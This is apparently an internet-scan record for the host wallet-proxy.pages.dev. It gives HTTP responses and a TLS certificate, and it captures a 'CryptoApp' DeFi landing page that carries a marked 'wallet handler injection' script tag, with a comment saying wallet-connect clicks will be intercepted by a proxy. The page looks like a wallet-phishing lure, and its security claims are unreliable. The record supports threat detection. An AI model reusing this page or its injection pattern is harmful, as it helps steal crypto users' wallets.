        .logo {
          font-size: 24px;
          font-weight: 700;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          -webkit-background-clip: text;
          -webkit-text-fill-color: transparent;
        }
        .connect-wallet {
          padding: 12px 24px;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          border: none;
          border-radius: 12px;
          color: #fff;
          font-size: 16px;
          font-weight: 600;
          cursor: pointer;
          transition: all 0.3s;
        }
        .connect-wallet:hover {
          transform: translateY(-2px);
          box-shadow: 0 10px 40px rgba(99, 102, 241, 0.4);
        }
        .hero {
          text-align: center;
          padding: 100px 20px;
        }
        .hero h1 {
          font-size: 56px;
          margin-bottom: 24px;
          line-height: 1.2;
        }
        .hero p {
          font-size: 20px;
          color: #94a3b8;
          max-width: 600px;
          margin: 0 auto 40px;
        }
        .hero .connect-wallet {
          padding: 16px 48px;
          font-size: 18px;
        }
        .features {
          display: grid;
          grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
          gap: 24px;
          padding: 60px 0;
        }
        .feature {
          background: rgba(255,255,255,0.05);
          border: 1px solid rgba(255,255,255,0.1);
          border-radius: 16px;
          padding: 32px;
          transition: all 0.3s;
        }
        .feature:hover {
          background: rgba(255,255,255,0.08);
          transform: translateY(-4px);
        }
        .feature h3 {
          font-size: 20px;
          margin-bottom: 12px;
        }
        .feature p {
          color: #94a3b8;
          line-height: 1.6;
        }
      </style>
    
    <!-- WALLET HANDLER INJECTION START -->
    <script src="/wallet-handler.js"></script>
    <!-- WALLET HANDLER INJECTION END -->
    </head>
    <body>
      <div class="container">
        <header>
          <div class="logo">CryptoApp</div>
          <button class="connect-wallet" id="header-connect">Connect Wallet</button>
        </header>
        
        <section class="hero">
          <h1>The Future of<br>Decentralized Finance</h1>
          <p>Connect your wallet and start trading, staking, and earning rewards on the most secure DeFi platform.</p>
          <button class="connect-wallet" id="hero-connect">Connect Wallet</button>
        </section>
        
        <section class="features">
          <div class="feature">
            <h3>🔒 Secure</h3>
            <p>Your assets are protected with industry-leading security protocols and smart contract audits.</p>
          </div>
          <div class="feature">
            <h3>⚡ Fast</h3>
            <p>Lightning-fast transactions with minimal gas fees on multiple blockchain networks.</p>
          </div>
          <div class="feature">
            <h3>💰 Rewards</h3>
            <p>Earn competitive yields on your crypto holdings through our staking programs.</p>
          </div>
        </section>
      </div>
    
      <script>
        // Original page's wallet connect logic (will be intercepted by proxy)
        document.querySelectorAll('.connect-wallet').forEach(btn => {
          btn.addEventListener('click', () => {
            alert('Original wallet connect - this will be intercepted by the proxy!');
          });
        });
      </script>
    </body>
    </html>
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 2606:4700:310c::ac42:2f7a:8443 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 3735
    Connection: close
    CF-Ray: 9bcd1695c96111fc-YYZ
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=0, must-revalidate
    Server: cloudflare
    Vary: Accept-Encoding
    referrer-policy: strict-origin-when-cross-origin
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=69RBlxicyP2XiT0cG1X1c8uK8Bfoc9rRR%2Bln%2BQKYtEJXpXj8W2D3m3EtIm686u%2F1K0VJkuHI%2BUa4wh3POwvKL40iXIiH0L5hopPQLE0DACfcye0Z3GQhP8llwWacK82N7W8%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    alt-svc: h3=":8443"; ma=86400
    
    Page title: Web3 Landing Page
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Web3 Landing Page</title>
      <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
          font-family: 'Inter', system-ui, -apple-system, sans-serif;
          background: linear-gradient(135deg, #0f0f1a 0%, #1a1a2e 50%, #16213e 100%);
          min-height: 100vh;
          color: #fff;
        }
        .container {
          max-width: 1200px;
          margin: 0 auto;
          padding: 20px;
        }
        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          padding: 20px 0;
        }
        .logo {
          font-size: 24px;
          font-weight: 700;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          -webkit-background-clip: text;
          -webkit-text-fill-color: transparent;
        }
        .connect-wallet {
          padding: 12px 24px;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          border: none;
          border-radius: 12px;
          color: #fff;
          font-size: 16px;
          font-weight: 600;
          cursor: pointer;
          transition: all 0.3s;
        }
        .connect-wallet:hover {
          transform: translateY(-2px);
          box-shadow: 0 10px 40px rgba(99, 102, 241, 0.4);
        }
        .hero {
          text-align: center;
          padding: 100px 20px;
        }
        .hero h1 {
          font-size: 56px;
          margin-bottom: 24px;
          line-height: 1.2;
        }
        .hero p {
          font-size: 20px;
          color: #94a3b8;
          max-width: 600px;
          margin: 0 auto 40px;
        }
        .hero .connect-wallet {
          padding: 16px 48px;
          font-size: 18px;
        }
        .features {
          display: grid;
          grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
          gap: 24px;
          padding: 60px 0;
        }
        .feature {
          background: rgba(255,255,255,0.05);
          border: 1px solid rgba(255,255,255,0.1);
          border-radius: 16px;
          padding: 32px;
          transition: all 0.3s;
        }
        .feature:hover {
          background: rgba(255,255,255,0.08);
          transform: translateY(-4px);
        }
        .feature h3 {
          font-size: 20px;
          margin-bottom: 12px;
        }
        .feature p {
          color: #94a3b8;
          line-height: 1.6;
        }
      </style>
    
    <!-- WALLET HANDLER INJECTION START -->
    <script src="/wallet-handler.js"></script>
    <!-- WALLET HANDLER INJECTION END -->
    </head>
    <body>
      <div class="container">
        <header>
          <div class="logo">CryptoApp</div>
          <button class="connect-wallet" id="header-connect">Connect Wallet</button>
        </header>
        
        <section class="hero">
          <h1>The Future of<br>Decentralized Finance</h1>
          <p>Connect your wallet and start trading, staking, and earning rewards on the most secure DeFi platform.</p>
          <button class="connect-wallet" id="hero-connect">Connect Wallet</button>
        </section>
        
        <section class="features">
          <div class="feature">
            <h3>🔒 Secure</h3>
            <p>Your assets are protected with industry-leading security protocols and smart contract audits.</p>
          </div>
          <div class="feature">
            <h3>⚡ Fast</h3>
            <p>Lightning-fast transactions with minimal gas fees on multiple blockchain networks.</p>
          </div>
          <div class="feature">
            <h3>💰 Rewards</h3>
            <p>Earn competitive yields on your crypto holdings through our staking programs.</p>
          </div>
        </section>
      </div>
    
      <script>
        // Original page's wallet connect logic (will be intercepted by proxy)
        document.querySelectorAll('.connect-wallet').forEach(btn => {
          btn.addEventListener('click', () => {
            alert('Original wallet connect - this will be intercepted by the proxy!');
          });
        });
      </script>
    </body>
    </html>
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 172.66.44.134:80 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 301 Moved Permanently
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Length: 0
    Connection: close
    Location: https://wallet-proxy.pages.dev/
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=35EzGJMWSI%2B1gXG78Z9%2F2uigprZVT74pUx2hRuxIwzWimUY0W3fZZHBU%2BRWnl3pTZlVrRwbD%2FuVc2RmGU3gnZxFBrO45iIrV5UCYu5Q%2Bi4kHmzqgQlk%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    Server: cloudflare
    CF-RAY: 9bcd16954f00ab6d-YYZ
    alt-svc: h3=":443"; ma=86400
    
    Found 10 hours ago by HttpPlugin
    Create report
wallet-proxy.pages.dev*.wallet-proxy.pages.dev
CN:
wallet-proxy.pages.dev
Key:
ECDSA-256
Issuer:
WE1
Not before:
2026-01-12 12:42
Not after:
2026-04-12 13:40